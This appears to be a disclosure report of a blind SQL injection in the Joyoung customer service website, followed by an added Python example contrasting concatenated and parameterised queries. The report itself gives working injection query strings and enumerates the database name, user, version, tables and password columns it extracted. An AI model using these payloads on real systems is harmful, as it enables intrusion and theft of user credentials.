The Joyoung customer service center website has a MySQL string-type blind SQL injection (administrator and all registered user information can be obtained):
?
page.curPage=1&page.zongPageStr=7&page.zongNumsStr=105&page.fen=15&rzong=105&wdname=&wdsort=&wdcode=&wdsheng=&wdshi=&fuzeren=&wdurl='%20aNd%20'a'%20lIke%20'a
?
page.curPage=1&page.zongPageStr=7&page.zongNumsStr=105&page.fen=15&rzong=105&wdname=&wdsort=&wdcode=&wdsheng=&wdshi=&fuzeren=&wdurl='%20and%20(select%20length(database()))=12%20aNd%20's'%20lIke%20's
?
page.curPage=1&page.zongPageStr=7&page.zongNumsStr=105&page.fen=15&rzong=105&wdname=&wdsort=&wdcode=&wdsheng=&wdshi=&fuzeren=&wdurl='%20and%20(select%20abs(ascii(substr(database(),1,1))))=107%20and%20108%20aNd%20's'%20lIke%20's
...
...
...
and so on!
Database file directory: /var/lib/mysql/
Current database name: kfjoyoungscf
Current user: service127@localhost
Database version: 5.5.11-log
Some table names in the current database:
t_adminuser
t_diaocha
t_grade
t_hint
t_joyperson
t_joyuserlogin
t_jubao
t_liucheng
t_minglie
t_myproduct
t_newsbankuai
...
Some column names in the t_joyuserlogin table:
joyloginid
joyloginname
joypasswd
joytype
joypasswdt
registertime
lastlogintime
todaylogintimes
totaltimes
email
...
Fix:
Apply the necessary filtering!
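Added example (not code from the report or the site): the search parameter `wdurl` from the requests above is built into a LIKE query by string concatenation, and the fix is to bind it as a parameter instead. The table and column names, the `LIKE '%...%'` query shape, and the use of SQLite as a stand-in for MySQL are assumptions.

```python
import sqlite3

# Constructed sample of a store table with the search column the report targets
# (table name and second column are assumptions, not from the report).
ROWS = [
    ("Shop A", "http://example.invalid/a"),
    ("Shop B", "http://example.invalid/b"),
]

# The tautology from the report's first request, URL-decoded.
PAYLOAD = "' aNd 'a' lIke 'a"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_store (wdname TEXT, wdurl TEXT)")
    conn.executemany("INSERT INTO t_store VALUES (?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, wdurl):
    # The user value becomes part of the SQL text, so a quote in the input
    # rewrites the WHERE clause: '%' aNd 'a' lIke 'a%' is true for every row.
    sql = ("SELECT wdname FROM t_store WHERE wdurl LIKE '%" + wdurl + "%' "
           "ORDER BY wdname")
    return [r[0] for r in conn.execute(sql)]


def like_pattern(term):
    # Escape LIKE metacharacters so the input is matched literally, then wrap
    # it in wildcards for the "contains" search.
    escaped = (term.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))
    return "%" + escaped + "%"


def lookup_fixed(conn, wdurl):
    # Bound parameter: the driver passes the value separately from the SQL
    # text, so quotes and keywords in it are never parsed as SQL.
    sql = "SELECT wdname FROM t_store WHERE wdurl LIKE ? ESCAPE '\\' ORDER BY wdname"
    return [r[0] for r in conn.execute(sql, (like_pattern(wdurl),))]


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, PAYLOAD))  # every row: the clause became a tautology
    print(lookup_fixed(db, PAYLOAD))       # [] : the payload is just a literal string
```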
Author: leaf, www.xuhantao.com (Taotao Computer Knowledge Network)